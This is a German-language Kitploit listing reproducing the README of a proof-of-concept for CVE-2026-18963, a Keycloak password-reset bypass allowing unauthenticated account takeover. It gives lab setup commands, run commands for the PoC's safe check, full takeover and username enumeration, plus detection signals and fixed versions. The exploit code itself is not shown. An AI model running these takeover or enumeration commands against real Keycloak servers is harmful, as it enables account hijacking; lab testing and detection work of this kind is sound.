Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Keycloak_CVE-2026-18963_PoC — Dieses Repo ist ein PoC für cve-2026-18963. Bitte verwenden Sie es nur auf legalen Produkten (Labor, lokal, ...). | Kitploit
Tools/GitHubGitHub/prot0tw/keycloak_cve-2026-18963_poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLabs & Praxis
GitHubprot0tw/keycloak_cve-2026-18963_poc

Keycloak_CVE-2026-18963_PoC

Dieses Repo ist ein PoC für cve-2026-18963. Bitte verwenden Sie es nur auf legalen Produkten (Labor, lokal, ...).

Repository anzeigen
12vor 2 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-18963

Keycloak reset-credentials-Bypass → nicht authentifizierte Kontoübernahme CVSS 9.1 | Betroffen: Keycloak 26.0.0 – 26.7.1

Dieses Labor wurde aus der ursprünglichen README von snizi/cve-2026-18963-exploit rekonstruiert.


Aufbau

root@kitploit:~
CVE-2026-18963/
├── cve_2026_18963_poc.py   <- PoC-Skript (Python 3.9+, nur Standardbibliothek)
├── README.md
├── docker-compose.yml      <- Laborumgebung
└── realm-poc.json          <- Keycloak-Realm-Konfiguration (automatisch importiert)

Voraussetzungen

  • Docker + Docker Compose
  • Python 3.9+ (nur Standardbibliothek, nichts zu installieren)
  • Linux

Schritt 1: Labor starten

root@kitploit:~
docker compose up -d

Oder Keycloak direkt ausführen, ohne den Realm-Import:

root@kitploit:~
docker run -p 127.0.0.1:8080:8080 \
  -e KC_BOOTSTRAP_ADMIN_USERNAME=admin \
  -e KC_BOOTSTRAP_ADMIN_PASSWORD=admin \
  quay.io/keycloak/keycloak:26.7.1 start-dev

Warten Sie ~30–60 Sekunden, bis Keycloak vollständig gestartet ist.

Dienste

DienstURLVersionStatus
kc-vulnhttp://localhost:808026.7.1VERWUNDBAR ⚠️
Mailpithttp://localhost:8025latestErfasst E-Mails

Standard-Anmeldedaten

  • Keycloak-Admin: admin / admin
  • Opfer-Benutzer: victim / OriginalPassw0rd!
  • Realm: poc | Client: poc-app
  • Konfiguration überprüfen: Realm-Einstellungen → Login-Registerkarte → Passwort vergessen ist AKTIVIERT.
  • Wenn der poc-Realm oder der victim-Benutzer fehlt, importieren Sie ihn manuell: Realms verwalten → Realm erstellen → realm-poc.json hochladen.

Schritt 2: PoC ausführen

Sicherer Check (kein Benutzername erforderlich, keine Nebenwirkungen)

root@kitploit:~
python3 cve_2026_18963_poc.py \
  --base http://localhost:8080 --realm poc \
  --client-id poc-app \
  --redirect-uri http://localhost:9999/callback \
  --safe-check

Erwartetes Ergebnis auf kc-vuln: [!] VERWUNDBAR — E-Mail-Gate-Ausführung bereitgestellt


Nicht-destruktiver Beweis (stoppt am Update-Passwort-Formular)

root@kitploit:~
python3 cve_2026_18963_poc.py \
  --base http://localhost:8080 --realm poc \
  --client-id poc-app \
  --redirect-uri http://localhost:9999/callback \
  --victim victim --check

Nebenwirkungen: Eine Reset-E-Mail wird an das Opfer gesendet (einsehbar unter http://localhost:8025), und emailVerified wird auf true gesetzt.


Vollständige Übernahme

root@kitploit:~
python3 cve_2026_18963_poc.py \
  --base http://localhost:8080 --realm poc \
  --client-id poc-app \
  --redirect-uri http://localhost:9999/callback \
  --victim victim \
  --new-password 'PoCPassw0rd!1'

Anschließend überprüfen, indem Sie sich unter http://localhost:8080/realms/poc/account mit victim / PoCPassw0rd!1 anmelden.


Benutzernamen-Enumeration

root@kitploit:~
printf 'victim\nadmin\nnobody\n' > userlist.txt

python3 cve_2026_18963_poc.py \
  --base http://localhost:8080 --realm poc \
  --client-id poc-app \
  --redirect-uri http://localhost:9999/callback \
  --enum userlist.txt

Schritt 3: Opfer in den Ausgangszustand zurücksetzen

Der Realm wird nur beim ersten Start importiert, daher ist der einfachste Reset, die Umgebung von Grund auf neu zu erstellen:

root@kitploit:~
docker compose down -v && docker compose up -d

Alternativ das Passwort manuell in der Admin-Konsole zurücksetzen (http://localhost:8080/admin): Benutzer → victim → Anmeldedaten → Passwort zurücksetzen → OriginalPassw0rd!.


Abbau

root@kitploit:~
docker compose down -v

Erkennungssignale

SignalLegitimExploit
GET /login-actions/action-token?...✅ Ja❌ Nein
POST .../reset-credentials mit Body tryAnotherWay=yes❌ Nein✅ Ja
SEND_RESET_PASSWORD → UPDATE_PASSWORD mit derselben code_id < 2 sSelten✅ Immer
emailVerified wechselt auf true ohne VERIFY_EMAIL-Ereignis❌✅ Immer

In Mailpit (http://localhost:8025) trifft die Passwort-Reset-E-Mail im Postfach des Opfers ein, aber der Link darin wird nie angeklickt, wenn der Exploit erfolgreich ist.


Betroffene Versionen

Release-LinieBetroffenFix
≤ 17 (WildFly)Nein—
26.0 – 26.326.0.0 – 26.x.xKeiner (Wechsel zu 26.7.2 erforderlich)
26.426.4.0 – 26.4.1426.4.15 (Hersteller-Backport)
26.526.5.0 – 26.5.7Keiner
26.626.6.0 – 26.6.526.6.6 (Hersteller-Backport)
26.726.7.0 – 26.7.126.7.2 ✅

Versionen vor 26.0 sind nicht betroffen: Die sticky AUTHENTICATION_SELECTOR_SCREEN_DISPLAYED-Notiz und der "Anderen Weg versuchen"- Auswahlbildschirm im Reset-Ablauf wurden in 26.0.0 eingeführt. Ältere Builds besitzen den verwundbaren Codepfad schlicht nicht — das ist nicht dasselbe wie gepatcht zu sein.


Referenzen

  • Sploitus (ursprüngliche README): https://sploitus.com/exploit?id=A76D2FC5-1440-568B-81C2-B0213465485E
  • Keycloak-Issue: https://github.com/keycloak/keycloak/issues/51833
  • Fix-PR: https://github.com/keycloak/keycloak/pull/51844
  • GHSA: GHSA-4gv3-mc9p-5wqc
  • Red Hat: https://access.redhat.com/security/cve/cve-2026-18963
Tool herunterladen